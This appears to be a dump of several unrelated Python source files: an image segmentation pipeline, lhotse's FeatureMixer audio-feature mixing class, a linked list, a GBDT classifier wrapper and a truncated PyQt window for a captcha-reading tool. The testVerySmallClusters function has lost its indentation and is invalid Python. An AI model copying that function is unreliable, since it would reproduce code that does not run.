    for each blob applied to the image; blobs holds the masked label raster.
    Filenames encode the crop's upper-left offset: <ul_x>_<ul_y>_<group>.tif.

    :param input_img: Either the filepath to the input img (input_mode='fp') or a numpy array (input_mode='np').
    :type input_img: str or numpy array
    :param input_blobs: Either the filepath to the input blobs (input_mode='fp') or a numpy array (input_mode='np').
    :type input_blobs: str or numpy array
    :param input_mode: 'fp' if inputs are filepaths or 'np' if numpy arrays.
    :type input_mode: str
    :param output_root: The filepath to the directory where clusters will be saved.
    :type output_root: str
    :return: Returns 0 upon completion.
    :rtype: int
    """
    if input_mode == 'fp':
        np_img = loadImage(input_img)
        np_blobs = loadImage(input_blobs)
    elif input_mode == 'np':
        np_img = input_img
        np_blobs = input_blobs
    else:
        return (input_mode, " is not a supported mode. Supported modes are 'np' or 'fp'.")
    # One label value per connected component (includes the background label).
    clusters = np.unique(np_blobs)
    output_base = output_root + '/base'
    output_blobs = output_root + '/blobs'
    if not os.path.exists(output_base):
        os.makedirs(output_base)
    if not os.path.exists(output_blobs):
        os.makedirs(output_blobs)
    group_counter = 0
    print(len(clusters))
    for i in sorted(clusters):
        print("i", i)
        print("group", group_counter)
        # Boolean mask of this blob, applied to both the image and the labels.
        single_blob = np.where(np_blobs == i, True, False)
        base_out = single_blob*np_img
        blob_out = single_blob*np_blobs
        # Crop both outputs to the blob's bounding box; the forward/backward
        # offsets give the upper-left and lower-right corners of that box.
        trimmed_blob_out = trim2DArray(blob_out)
        ul_x, ul_y = calculateTrimOffsetForward(blob_out)
        lr_x, lr_y = calculateTrimOffsetBackward(blob_out)
        trimmed_base_out = base_out[ul_y:lr_y,ul_x:lr_x]
        print('base', trimmed_base_out.shape)
        print('blob', trimmed_blob_out.shape)
        if testVerySmallClusters(trimmed_blob_out, 'np') or np.count_nonzero(base_out) < 5: # 5 is a magic constant but there's some logic here. how many points are needed to identify a circle? at least 3 needed in theory, more needed depending on the scanner
            print('skipping cluster')
            continue
        sub_base = output_base + '/' + str(ul_x) + '_' + str(ul_y) + '_' +str(group_counter) + '.tif'
        sub_blob = output_blobs + '/' + str(ul_x) + '_' + str(ul_y) + '_' + str(group_counter) + '.tif'
        saveImage(trimmed_base_out, sub_base)
        saveImage(trimmed_blob_out, sub_blob, mode='blob_labels')
        group_counter += 1
    return 0
def ridgeDetection(input_img, input_mode, method='meijering', black_ridges=False, output_path=None):
    """ Applies ridge detection to an input image.

    :param input_img: Either the filepath to the input img (input_mode='fp') or a numpy array (input_mode='np').
    :type input_img: str or numpy array
    :param input_mode: 'fp' if input_img is a filepath or 'np' if input_img is a numpy array.
    :type input_mode: str
    :param method: Ridge detection algorithm, defaults to meijering (the only
        one currently supported).
    :type method: str
    :param black_ridges: Controls whether black or white pixels are the ridges, defaults to False (white pixels = ridge).
    :type black_ridges: bool
    :param output_path: The filepath of the image to be saved.
    :type output_path: str, optional
    :return: Returns numpy array of the ridge response.
    :rtype: numpy array
    :raises ValueError: if *method* is not a supported ridge detector.
    """
    if input_mode == 'fp':
        np_img = loadImage(input_img)
    elif input_mode == 'np':
        np_img = input_img
    else:
        return (input_mode, " is not a supported mode. Supported modes are 'np' or 'fp'.")
    if method == 'meijering':
        np_ridges = filters.meijering(np_img, black_ridges=black_ridges)
    else:
        # BUG FIX: an unrecognised method used to fall through silently and
        # the subsequent use of np_ridges raised UnboundLocalError; fail with
        # a clear message instead.
        raise ValueError("%r is not a supported ridge detection method; supported: 'meijering'" % (method,))
    if output_path is not None:
        saveImage(np_ridges, output_path)
    return(np_ridges)
# low level
def loadImage(img_path):
    """ Read the image at *img_path* with PIL and return its pixel data.

    :param img_path: Filepath to the input img
    :type img_path: str
    :return: Returns the image loaded as a numpy array.
    :rtype: numpy array
    """
    return np.array(Image.open(img_path))
def saveImage(np_img, output_path, mode=None, scale=255.0):
    """ Takes a np array as input and saves it to output path using PIL.

    Current supported modes are:
    dist_norm - distance normalization I use for distance transforms
    blob_labels - 255 scaling I use for connected components

    :param np_img: The numpy array to be saved
    :type np_img: numpy array
    :param output_path: The filepath of the image to be saved.
    :type output_path: str
    :param mode: There are two convenience modes: 'dist_norm' (distance transform normalization) and 'blob_labels' (blob labelling), defaults to None.
    :type mode: str
    :param scale: Value used for scaling in distance normalization, defaults to 255.0
    :type scale: int or float
    :return: Returns 0 if the file exists after saving, otherwise 1.
    :rtype: int
    """
    if mode is not None:
        if mode == 'dist_norm':
            # BUG FIX: this used to do `np_img *= scale/np_img.max()`, which
            # scaled the CALLER's array in place as a hidden side effect (and
            # raised on integer dtypes, where in-place float multiply is an
            # unsafe cast).  Scale into a fresh array instead.
            scaled = np_img * (scale / np_img.max())
            np_out = Image.fromarray(scaled.astype('uint8'))
        elif mode == 'blob_labels':
            np_out = Image.fromarray((np_img*255).astype(np.uint8))
        else:
            return (mode, " is not a supported mode.")
    else:
        np_out = Image.fromarray(np_img)
    np_out.save(output_path)
    if os.path.exists(output_path):
        return 0
    else:
        return 1
def trim2DArray(input_arr, threshold=0):
    """ Convenience function to trim a 2D array. Removes any exterior rows/
    columns whose sums are less than or equal to the threshold. Source:
    https://stackoverflow.com/questions/11188364/remove-zero-lines-2-d-numpy-array?utm_medium=organic&utm_source=google_rich_qa&utm_campaign=google_rich_qa

    :param input_arr: A 2D numpy array to be trimmed.
    :type input_arr: numpy array
    :param threshold: Any exterior row or column with a total less than or equal to threshold will be removed, defaults to 0.
    :type threshold: int or float
    :return: Returns a subset of the input array.
    :rtype: numpy array
    """
    # CLEANUP: leftover debug prints of the input/output shapes were removed;
    # behaviour is otherwise unchanged.
    ul_x, ul_y = calculateTrimOffsetForward(input_arr, threshold)
    lr_x, lr_y = calculateTrimOffsetBackward(input_arr, threshold)
    return input_arr[ul_y:lr_y, ul_x:lr_x]
def calculateTrimOffsetForward(input_arr, threshold=0):
    """ Calculate the upper-left corner offset a trim would produce. The
    threshold should be the same as whatever is used in trim2DArray.

    :param input_arr: A 2D numpy array to be trimmed.
    :type input_arr: numpy array
    :param threshold: Any exterior row or column with a total less than or equal to threshold will be removed, defaults to 0.
    :type threshold: int or float
    :return: Returns the x and y of the upper left corner.
    :rtype: int, int
    """
    col_sum = np.sum(input_arr, axis=0)
    row_sum = np.sum(input_arr, axis=1)
    # First column/row whose total exceeds the threshold; 0 when none does,
    # matching the original scan-with-break behaviour.
    col_hits = np.flatnonzero(col_sum > threshold)
    row_hits = np.flatnonzero(row_sum > threshold)
    ul_x = int(col_hits[0]) if col_hits.size else 0
    ul_y = int(row_hits[0]) if row_hits.size else 0
    return (ul_x, ul_y)
def calculateTrimOffsetBackward(input_arr, threshold=0):
    """ Calculate the lower-right corner offset a trim would produce. The
    threshold should be the same as whatever is used in trim2DArray.

    :param input_arr: A 2D numpy array to be trimmed.
    :type input_arr: numpy array
    :param threshold: Any exterior row or column with a total less than or equal to threshold will be removed, defaults to 0.
    :type threshold: int or float
    :return: Returns the x and y of the lower right corner.
    :rtype: int, int
    """
    n_rows, n_cols = input_arr.shape
    col_sum = np.sum(input_arr, axis=0)
    row_sum = np.sum(input_arr, axis=1)
    # One past the last column/row whose total exceeds the threshold; the
    # full extent when none does -- equivalent to the original's scan over
    # the doubly-flipped array.
    col_hits = np.flatnonzero(col_sum > threshold)
    row_hits = np.flatnonzero(row_sum > threshold)
    lr_x = int(col_hits[-1]) + 1 if col_hits.size else n_cols
    lr_y = int(row_hits[-1]) + 1 if row_hits.size else n_rows
    return (lr_x, lr_y)
def testVerySmallClusters(input_img, input_mode, min_rad=7.5):
""" This functions takes a cluster as input and tests if its biggest
circle would be too small.
Returns True if it's smaller and False if it's bigger.
:param input_img: Either the filepath to the input img (input_mode='fp') or a numpy array (input_mode='np').
:type input_img: str or numpy array
:param input_mode: 'fp' if input_img is a filepath or 'np' if input_img is a numpy array.
:type input_mode: str
:param min_rad: the minimum radius for a valid cluster, defaults to 7.5
:type min_rad: int or float
:return: Returns True if the image is too small to be a valid cluster, otherwise False.
:rtype: bool
"""
if input_mode == 'fp':
np_img = loadImage(input_img)
elif input_mode == 'np':
np_img = input_img
else:
return (input_mode, " is not a supported mode. Supported modes are 'np' or 'fp'.")
dim = np_img.shape
if dim[0] <= dim[1]:
length = dim[0]
else:
length = dim[1]
if length/2. < min_rad:
return True
else:
return False
def circleMask(img, cir_x, cir_y, r, mode, filter=0):
    """ Apply a binary circular mask to a 2D image array.
    Pixels on the masked side of the circle centered at (cir_x, cir_y) with
    radius r are set to ``filter``; every remaining pixel is set to
    ``255 - filter``. With mode 'interior' the inside of the circle is masked
    out; with 'exterior' the outside is.
    https://towardsdatascience.com/the-little-known-ogrid-function-in-numpy-19ead3bdae40
    :param img: An image loaded as a 2D numpy array.
    :type img: numpy array
    :param cir_x: The x coordinate of the center of the circle.
    :type cir_x: int
    :param cir_y: The y coordinate of the center of the circle.
    :type cir_y: int
    :param r: The radius of the circle mask
    :type r: int
    :param mode: Determines what is inside and outside the mask. Must be interior or exterior
    :type mode: str
    :param filter: The value for pixels outside the mask, defaults to 0.
    :type filter: int or float
    :return: A masked copy of the image, or 1 when the mode is invalid.
    :rtype: numpy array or int
    """
    if mode not in ('interior', 'exterior'):
        print(mode, "is not a supported mode. Please enter interior or exterior")
        return 1
    rows, cols = img.shape
    # Open grid of coordinates for vectorized distance computation.
    grid_y, grid_x = np.ogrid[0:rows, 0:cols]
    dist_sq = (grid_x - cir_x) ** 2 + (grid_y - cir_y) ** 2
    if mode == 'interior':
        mask = dist_sq <= r ** 2
    else:
        mask = dist_sq >= r ** 2
    # Operate on a copy; binarize to {filter, 255 - filter}.
    masked = img.copy()
    masked[mask] = [filter]
    masked[masked != filter] = [255 - filter]
    return masked
def countPixels(input_img, input_mode, x, y, r):
    """ Counts non-zero pixels around (x, y) in three zones: the core disk,
    an inner ring, and an outer ring between radius r and 1.2*r.
    :param input_img: Either the filepath to the input img (input_mode='fp') or a numpy array (input_mode='np').
    :type input_img: str or numpy array
    :param input_mode: 'fp' if input_img is a filepath or 'np' if input_img is a numpy array.
    :type input_mode: str
    :param x: The x coordinate of the center of the circle.
    :type x: int
    :param y: The y coordinate of the center of the circle.
    :type y: int
    :param r: The radius around the center of the circle
    :type r: int
    :return: Returns the (core, inner, outer) pixel counts.
    :rtype: tuple of int
    """
    if input_mode == 'fp':
        np_img = loadImage(input_img)
    elif input_mode == 'np':
        np_img = input_img
    else:
        return (input_mode, " is not a supported mode. Supported modes are 'np' or 'fp'.")
    base_img = circleMask(np_img, x, y, r, 'exterior')
    # NOTE(review): core_img and inner_img are computed with the identical
    # mask call (radius r*0.8, 'exterior') — looks duplicated; confirm intent.
    core_img = circleMask(np_img, x, y, r * 0.8, 'exterior')
    core_count = np.count_nonzero(base_img * core_img)
    inner_img = circleMask(np_img, x, y, r * 0.8, 'exterior')
    inner_count = np.count_nonzero(base_img - inner_img)
    outer_img = circleMask(np_img, x, y, r * 1.2, 'exterior')
    outer_count = np.count_nonzero(outer_img - base_img)
    return (core_count, inner_count, outer_count)
# multiprocessing
def segmentationVisionQueue(q, output_dir, save_intermediate=False, overwrite=False):
    """ This is a queue for multiprocessing: drains the queue and runs the
    segmentation pipeline on every image path it holds.
    :param q: the queue generated by segment Directory
    :type q: Multiprocessing.Queue object
    :param output_dir: the filepath to the directory where outputs will be saved.
    :type output_dir: str
    :param save_intermediate: Flag to save intermediate outputs to disk, defaults to False.
    :type save_intermediate: bool
    :param overwrite: Flag to overwrite existing outputs, defaults to False.
    :type overwrite: bool
    """
    while not q.empty():
        try:
            img_path = q.get()
            print("input img: ", img_path)
            # this is hard coded to run on my registered rasters only
            # file name without directory, with the 4-char extension dropped
            stem = img_path.split('/')[-1][:-4]
            applySegmentationSteps(img_path, 'fp', output_dir + '/' + stem,
                                   save_intermediate=save_intermediate,
                                   overwrite=overwrite)
        except ValueError as val_error:
            print(val_error)
        except Exception as error:
            # best-effort worker: log and keep draining the queue
            print(error)
def segmentDirectoryMP(input_dir, output_root, num_workers, target='.tif', save_intermediate=False, overwrite=False):
    """ A multiprocessing segmenter: queues every matching file in the input
    directory and hands the queue to a pool of segmentation workers.
    :param input_dir: Filepath to the input directory.
    :type input_dir: str
    :param output_root: The filepath to the directory where outputs will be created.
    :type output_root: str
    :param num_workers: Number of workers to assign.
    :type num_workers: int
    :param target: The file ending for valid inputs, defaults to '.tif'
    :type target: str
    :param save_intermediate: Flag to save intermediate outputs to disk, defaults to False.
    :type save_intermediate: bool
    :param overwrite: Flag to overwrite existing outputs, defaults to False.
    :type overwrite: bool
    """
    q = Queue()
    for entry in sorted(os.listdir(input_dir)):
        if not entry.endswith(target):
            continue
        q.put(input_dir + '/' + entry)
    # The worker function is passed as the Pool initializer, so each worker
    # drains the shared queue as soon as it starts.
    workers = Pool(num_workers, segmentationVisionQueue, (q, output_root, save_intermediate, overwrite))
    workers.close()
    workers.join()
def calculatePixelMetricsMP(input_img, input_df, num_workers=8):
    """ A multiproessing pixel metrics implementation: queues every detection
    row, lets the workers append augmented rows to a shared list, and builds
    the output dataframe from that list.
    :param input_img: Filepath to the input img
    :type input_img: str
    :param input_df: Dataframe with detections
    :type input_df: pandas dataframe
    :param num_workers: Number of workers to assign, defaults to 8.
    :type num_workers: int
    :return: Returns the dataframe augmented with pixel metrics.
    :rtype: pandas dataframe
    """
    manager = Manager()
    shared_rows = manager.list()
    q = Queue()
    for _, det in input_df.iterrows():
        q.put([det['plot'], det['x'], det['y'], det['r'], det['weight']])
    # Workers run calculatePixelMetricsQueue as their Pool initializer.
    workers = Pool(num_workers, calculatePixelMetricsQueue, (q, input_img, input_df, shared_rows))
    workers.close()
    workers.join()
    columns = ['plot', 'x', 'y', 'r', 'weight', 'core', 'inner', 'outer']
    print(len(shared_rows))
    return pd.DataFrame(list(shared_rows), columns=columns)
def calculatePixelMetricsQueue(q, input_img, input_df, output_list):
    """ This is a queue for multiprocessing: drains detection rows from the
    queue, computes pixel counts for each, and appends the augmented row to
    the shared output list.
    :param q: the queue generated by calculatePixelMetricsMP
    :type q: Multiprocessing.Queue object
    :param input_img: Filepath to the input img
    :type input_img: str
    :param input_df: Dataframe with detections
    :type input_df: pandas dataframe
    :param output_list: a Manager generated by calculatePixelMetricsMP
    :type output_list: Multiprocessing.Manager object
    """
    processed = 0
    while not q.empty():
        try:
            # Progress heartbeat every 10k rows.
            if processed % 10000 == 0 and processed > 0:
                print(processed)
            plot, x, y, r, weight = q.get()
            core, inner, outer = countPixels(input_img, 'fp', x, y, r)
            output_list.append([plot, x, y, r, weight, core, inner, outer])
            processed += 1
        except ValueError as val_error:
            print(val_error)
        except Exception as error:
            # best-effort worker: log and keep draining the queue
            print(error)
|
990,979 | fdfded4f9ada0b63d584f4144c1a86027269e8f2 | import logging
from typing import Optional
import numpy as np
from lhotse.features.base import FeatureExtractor
from lhotse.utils import Decibels, NonPositiveEnergyError, Seconds, compute_num_frames
class FeatureMixer:
    """
    Utility class to mix multiple feature matrices into a single one.
    It should be instantiated separately for each mixing session (i.e. each ``MixedCut``
    will create a separate ``FeatureMixer`` to mix its tracks).
    It is initialized with a numpy array of features (typically float32)
    that represents the "reference" signal for the mix.
    Other signals can be mixed to it with different time offsets and SNRs using the
    ``add_to_mix`` method.
    The time offset is relative to the start of the reference signal
    (only positive values are supported).
    The SNR is relative to the energy of the signal used to initialize the ``FeatureMixer``.
    It relies on the ``FeatureExtractor`` to have defined ``mix`` and ``compute_energy`` methods,
    so that the ``FeatureMixer`` knows how to scale and add two feature matrices together.
    """

    def __init__(
        self,
        feature_extractor: FeatureExtractor,
        base_feats: np.ndarray,
        frame_shift: Seconds,
        padding_value: float = -1000.0,
        reference_energy: Optional[float] = None,
    ):
        """
        FeatureMixer's constructor.
        :param feature_extractor: The ``FeatureExtractor`` instance that specifies how to mix the features.
        :param base_feats: The features used to initialize the ``FeatureMixer`` are a point of reference
            in terms of energy and offset for all features mixed into them.
        :param frame_shift: Required to correctly compute offset and padding during the mix.
        :param padding_value: The value used to pad the shorter features during the mix.
            This value is adequate only for log space features. For non-log space features,
            e.g. energies, use either 0 or a small positive value like 1e-5.
        :param reference_energy: Optionally pass a reference energy value to compute SNRs against.
            This might be required when ``base_feats`` correspond to padding energies.
        """
        self.feature_extractor = feature_extractor
        # Each element of ``tracks`` is a (possibly padded) feature matrix;
        # index 0 is the reference signal.
        self.tracks = [base_feats]
        # 2D input means mono; with a third axis, the last axis is treated as channels.
        self.num_channels = 1 if base_feats.ndim == 2 else base_feats.shape[-1]
        # ``gains[i]`` is the energy scaling factor applied to ``tracks[i + 1]``.
        self.gains = []
        self.frame_shift = frame_shift
        self.padding_value = padding_value
        # All padding arrays are created with the reference track's dtype.
        self.dtype = self.tracks[0].dtype
        # Keep a pre-computed energy value of the features that we initialize the Mixer with;
        # it is required to compute gain ratios that satisfy SNR during the mix.
        if reference_energy is None:
            self.reference_energy = feature_extractor.compute_energy(base_feats)
        else:
            self.reference_energy = reference_energy

    @property
    def num_features(self) -> int:
        # Number of feature bins (second axis of the reference track).
        return self.tracks[0].shape[1]

    @property
    def unmixed_feats(self) -> np.ndarray:
        """
        Return a numpy ndarray with the shape (num_tracks, num_frames, num_features), where each track's
        feature matrix is padded and scaled adequately to the offsets and SNR used in ``add_to_mix`` call.
        """
        return np.stack(self.tracks)

    @property
    def mixed_feats(self) -> np.ndarray:
        """
        Return a numpy ndarray with the shape (num_frames, num_features) - a mono mixed feature matrix
        of the tracks supplied with ``add_to_mix`` calls.
        """
        # Fold every added track into the reference one, applying the gain
        # that was computed for it when it was added.
        result = self.tracks[0]
        for feats_to_add, gain in zip(self.tracks[1:], self.gains):
            result = self.feature_extractor.mix(
                features_a=result, features_b=feats_to_add, energy_scaling_factor_b=gain
            )
        return result

    def _get_dummy_array(self, num_frames: int) -> np.ndarray:
        # Build a padding block of ``num_frames`` frames filled with
        # ``padding_value``, matching the mixer's channel layout and dtype.
        return np.full(
            shape=(num_frames, self.num_features)
            if self.num_channels == 1
            else (
                num_frames,
                self.num_features,
                self.num_channels,
            ),
            fill_value=self.padding_value,
            dtype=self.dtype,
        )

    def add_to_mix(
        self,
        feats: np.ndarray,
        sampling_rate: int,
        snr: Optional[Decibels] = None,
        offset: Seconds = 0.0,
    ) -> None:
        """
        Add feature matrix of a new track into the mix.
        :param feats: A 2D feature matrix to be mixed in.
        :param sampling_rate: The sampling rate of ``feats``
        :param snr: Signal-to-noise ratio, assuming ``feats`` represents noise (positive SNR - lower ``feats`` energy,
            negative SNR - higher ``feats`` energy)
        :param offset: How many seconds to shift ``feats`` in time. For mixing, the signal will be padded before
            the start with low energy values.
        """
        if len(feats) == 0:
            return  # do nothing for empty arrays
        assert offset >= 0.0, "Negative offset in mixing is not supported."
        assert (
            self.tracks[0].ndim == feats.ndim
        ), f"Feature dimensions mismatch in mixing"
        reference_feats = self.tracks[0]
        # Convert the offset in seconds into a number of frames.
        num_frames_offset = compute_num_frames(
            duration=offset, frame_shift=self.frame_shift, sampling_rate=sampling_rate
        )
        current_num_frames = reference_feats.shape[0]
        incoming_num_frames = feats.shape[0] + num_frames_offset
        mix_num_frames = max(current_num_frames, incoming_num_frames)
        feats_to_add = feats
        # When the existing frames are less than what we anticipate after the mix,
        # we need to pad after the end of the existing features mixed so far.
        if current_num_frames < mix_num_frames:
            for idx in range(len(self.tracks)):
                padded_track = np.vstack(
                    [
                        self.tracks[idx],
                        self._get_dummy_array(mix_num_frames - current_num_frames),
                    ]
                )
                self.tracks[idx] = padded_track
        # When there is an offset, we need to pad before the start of the features we're adding.
        if offset > 0:
            feats_to_add = np.vstack(
                [
                    self._get_dummy_array(num_frames_offset),
                    feats_to_add,
                ]
            )
        # When the features we're mixing in are shorter that the anticipated mix length,
        # we need to pad after their end.
        # Note: we're doing that inefficiently, as we potentially re-allocate numpy arrays twice,
        # during this padding and the offset padding before. If that's a bottleneck, we'll optimize.
        if incoming_num_frames < mix_num_frames:
            feats_to_add = np.vstack(
                [
                    feats_to_add,
                    self._get_dummy_array(mix_num_frames - incoming_num_frames),
                ]
            )
        # When SNR is requested, find what gain is needed to satisfy the SNR
        gain = 1.0
        if snr is not None and self.reference_energy > 0.0:
            # Compute the added signal energy before it was padded
            added_feats_energy = self.feature_extractor.compute_energy(feats)
            if added_feats_energy > 0.0:
                # gain scales the added track so its energy is ``snr`` dB
                # below (positive snr) or above (negative snr) the reference.
                target_energy = self.reference_energy * (10.0 ** (-snr / 10))
                gain = target_energy / added_feats_energy
        self.tracks.append(feats_to_add)
        self.gains.append(gain)
|
990,980 | 48cb6f2f8d759652affadb185386e77e577d4260 | __author__ = 'SunnyYan'
class SNode:
    """A node of a singly linked list: a value plus the link to the next node."""

    def __init__(self, item, next):
        # NOTE: the parameter name ``next`` shadows the builtin; it is kept
        # unchanged for interface compatibility with existing callers.
        self.item = item
        self.next = next
class SLinkedList:
    """A singly linked list tracking head, tail and size.

    Fixes over the original implementation:
    - ``is`` used for value comparison (``self.size is 0``,
      ``node.item is item``) replaced with ``==``; identity checks are
      incorrect for general objects and non-cached ints.
    - ``remove`` no longer raises AttributeError when the item is absent or
      sits at the tail (the original dereferenced ``currentNode.next.item``
      without a None guard), decrements ``size``, and keeps ``tail``
      consistent when the last node is removed.
    """

    def __init__(self):
        self.size = 0     # number of nodes currently in the list
        self.head = None  # first node, or None when empty
        self.tail = None  # last node, or None when empty

    def insertFront(self, item):
        """Prepend ``item`` in O(1)."""
        self.head = SNode(item, self.head)
        if self.tail is None:
            # List was empty: the new node is both head and tail.
            self.tail = self.head
        self.size += 1

    def insertBack(self, item):
        """Append ``item`` in O(1)."""
        node = SNode(item, None)
        if self.tail is None:
            self.head = self.tail = node
        else:
            self.tail.next = node
            self.tail = node
        self.size += 1

    def getHead(self):
        """Return the first node (or None)."""
        return self.head

    def getTail(self):
        """Return the last node (or None)."""
        return self.tail

    def isEmpty(self):
        """Return True when the list holds no nodes."""
        # BUG FIX: original used ``self.size is 0`` (identity comparison).
        return self.size == 0

    def remove(self, item):
        """Remove every node whose item equals ``item``.

        The original traversed the whole list, so remove-all is taken as the
        intended contract; head, tail and size are all kept consistent.
        """
        # Drop matching nodes at the front first.
        while self.head is not None and self.head.item == item:
            self.head = self.head.next
            self.size -= 1
        if self.head is None:
            self.tail = None
            return
        current = self.head
        while current.next is not None:
            if current.next.item == item:
                current.next = current.next.next
                self.size -= 1
            else:
                current = current.next
        # ``current`` is now the last surviving node.
        self.tail = current

    def printList(self):
        """Return the items in order (also cached on ``self.List``)."""
        self.List = []
        current = self.head
        while current is not None:
            self.List.append(current.item)
            current = current.next
        return self.List
# Testing single linked list
# l1 = SLinkedList()
# for i in range(0,10):
# l1.insertBack(i)
#
# print "The Single LinkedList should be [0,1,2,3,4,5,6,7,8,9]: " +str(l1.printList())
#
# l2 = SLinkedList()
# for i in range(0,10):
# l2.insertFront(i)
#
# print "The Single LinkedList should be [9,8,7,6,5,4,3,2,1,0]: " +str(l2.printList())
#
# print "The head of l1 now should be 0: " + str(l1.getHead().item)
# print "The tail of l1 now should be 9: " + str(l1.getTail().item)
# print "The head of l2 now should be 9: " + str(l2.getHead().item)
# print "The tail of l2 now should be 0: " + str(l2.getTail().item)
# print "Attempting remove node 9 from l1..."
# l1.remove(9)
# print "The Single LinkedList should be [0,1,2,3,4,5,6,7,8]: " +str(l1.printList())
# print "The tail of l1 now should be 8: " + str(l1.getTail().item)
|
990,981 | 07cdfbf30ac167d438d18e6a2d74a0a97dc3f5cd | #coding=utf-8
import numpy as np
import datetime
import sklearn.ensemble
import sklearn.model_selection
import pickle
import util
class GbdtModel(object):
    """Binary classifier wrapping a grid-searched GradientBoostingClassifier.

    ``fit`` tunes hyper-parameters with 5-fold cross-validation (scored with
    the project's KS scorer), keeps the best estimator and pickles it to
    ``gbdt_cls.pkl``.
    """

    def __init__(self):
        # Best estimator found by grid search; None until fit() has run.
        self.best_gbdt = None

    def get_sample_weight(self, target_values):
        """Return per-sample weights that balance the two classes.

        Positive samples get weight ``n_neg / n_total`` and negative samples
        ``n_pos / n_total``, so the rarer class is weighted up.

        :param target_values: 1D numpy array of 0/1 labels.
        :return: numpy array of per-sample weights, same length as the labels.
        """
        pos_sample_num = target_values.sum()
        neg_sample_num = len(target_values) - pos_sample_num
        pos_sample_weight = float(neg_sample_num) / len(target_values)
        neg_sample_weight = float(pos_sample_num) / len(target_values)
        sample_weight = np.zeros(shape=len(target_values))
        sample_weight[target_values == 1] = pos_sample_weight
        sample_weight[target_values == 0] = neg_sample_weight
        return sample_weight

    def fit_for_best_gbdt(self, feature_values, target_values):
        """Grid-search GBDT hyper-parameters, store and pickle the best model."""
        # NOTE(review): max_features="auto" is deprecated/removed in recent
        # scikit-learn (it meant "sqrt" for classifiers) — confirm the target
        # sklearn version before changing it.
        gbdt = sklearn.ensemble.GradientBoostingClassifier(max_features="auto")
        model_params = {"n_estimators": [300, 500, 600, 800],
                        "max_depth": [3],
                        "learning_rate": [0.1, 0.01, 0.05],
                        "subsample": [0.3, 0.5, 0.7]}
        gs = sklearn.model_selection.GridSearchCV(estimator=gbdt,
                                                  param_grid=model_params,
                                                  n_jobs=3,
                                                  cv=5,
                                                  scoring=util.ks_scorer,
                                                  verbose=10)
        now = datetime.datetime.now()
        print("grid search begins: %s" % str(now))
        # FIX: GridSearchCV's ``fit_params`` constructor argument was removed
        # from scikit-learn; fit-time parameters are passed to fit() instead.
        gs.fit(feature_values, target_values,
               sample_weight=self.get_sample_weight(target_values))
        now = datetime.datetime.now()
        print("grid search finished: %s" % str(now))
        print("best params : %s" % str(gs.best_params_))
        print("best score : %s" % str(gs.best_score_))
        self.best_gbdt = gs.best_estimator_
        # FIX: context manager guarantees the pickle handle is closed even if
        # dump() raises.
        with open("gbdt_cls.pkl", "wb") as f:
            pickle.dump(self.best_gbdt, f)

    def fit(self, feature_values, target_values):
        """Train on features/labels (delegates to fit_for_best_gbdt)."""
        self.fit_for_best_gbdt(feature_values, target_values)

    def predict(self, feature_values):
        """Predict 0/1 labels; requires fit() first."""
        assert self.best_gbdt is not None, "fit model first"
        return self.best_gbdt.predict(feature_values)

    def predict_proba(self, feature_values):
        """Return the positive-class probability; requires fit() first."""
        assert self.best_gbdt is not None, "fit model first"
        return self.best_gbdt.predict_proba(feature_values)[:, 1]

    def get_base_estimator(self):
        """Return the fitted estimator (None before fit)."""
        return self.best_gbdt

    def get_model_detail(self):
        """Return a dict describing the tuned hyper-parameters; requires fit() first."""
        assert self.best_gbdt is not None, "fit model first"
        params = self.best_gbdt.get_params()
        detail = dict()
        detail["model_name"] = "GBDT"
        detail["n_estimators"] = params["n_estimators"]
        detail["max_depth"] = params["max_depth"]
        detail["learning_rate"] = params["learning_rate"]
        detail["subsample"] = params["subsample"]
        return detail
990,982 | 52315178e81c9bba570f6fe4e945d5e701d63f05 | # -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'gui2.ui'
#
# Created by: PyQt5 UI code generator 5.12.1
#
# WARNING! All changes made in this file will be lost!
from PyQt5 import QtCore, QtGui, QtWidgets
class Ui_MainWindow(object):
    # Auto-generated by pyuic5 from gui2.ui (see the warning at the top of
    # the file) — regenerate from the .ui file instead of editing by hand.
    def setupUi(self, MainWindow):
        # Build the widget tree: a left column of pipeline-step buttons and a
        # right column with a picture label, five per-character labels, and a
        # result text box.
        MainWindow.setObjectName("MainWindow")
        MainWindow.resize(570, 489)
        self.centralwidget = QtWidgets.QWidget(MainWindow)
        self.centralwidget.setObjectName("centralwidget")
        self.gridLayout = QtWidgets.QGridLayout(self.centralwidget)
        self.gridLayout.setObjectName("gridLayout")
        # Right-hand column: picture, character labels, result box.
        self.verticalLayout = QtWidgets.QVBoxLayout()
        self.verticalLayout.setSizeConstraint(QtWidgets.QLayout.SetDefaultConstraint)
        self.verticalLayout.setContentsMargins(50, 20, 50, 20)
        self.verticalLayout.setSpacing(20)
        self.verticalLayout.setObjectName("verticalLayout")
        # Large label used as the picture preview area.
        self.label = QtWidgets.QLabel(self.centralwidget)
        sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)
        sizePolicy.setHorizontalStretch(0)
        sizePolicy.setVerticalStretch(0)
        sizePolicy.setHeightForWidth(self.label.sizePolicy().hasHeightForWidth())
        self.label.setSizePolicy(sizePolicy)
        self.label.setMinimumSize(QtCore.QSize(0, 100))
        self.label.setObjectName("label")
        self.verticalLayout.addWidget(self.label)
        # Row of five labels, presumably one per segmented character
        # (the app recognizes 5-character captchas) — confirm in MainWindow.
        self.horizontalLayout = QtWidgets.QHBoxLayout()
        self.horizontalLayout.setObjectName("horizontalLayout")
        self.little1 = QtWidgets.QLabel(self.centralwidget)
        self.little1.setObjectName("little1")
        self.horizontalLayout.addWidget(self.little1)
        self.little2 = QtWidgets.QLabel(self.centralwidget)
        self.little2.setObjectName("little2")
        self.horizontalLayout.addWidget(self.little2)
        self.little3 = QtWidgets.QLabel(self.centralwidget)
        sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Minimum)
        sizePolicy.setHorizontalStretch(0)
        sizePolicy.setVerticalStretch(0)
        sizePolicy.setHeightForWidth(self.little3.sizePolicy().hasHeightForWidth())
        self.little3.setSizePolicy(sizePolicy)
        self.little3.setMinimumSize(QtCore.QSize(0, 100))
        self.little3.setObjectName("little3")
        self.horizontalLayout.addWidget(self.little3)
        self.little4 = QtWidgets.QLabel(self.centralwidget)
        self.little4.setObjectName("little4")
        self.horizontalLayout.addWidget(self.little4)
        self.little5 = QtWidgets.QLabel(self.centralwidget)
        self.little5.setObjectName("little5")
        self.horizontalLayout.addWidget(self.little5)
        self.verticalLayout.addLayout(self.horizontalLayout)
        # Read-only text box showing the recognition result.
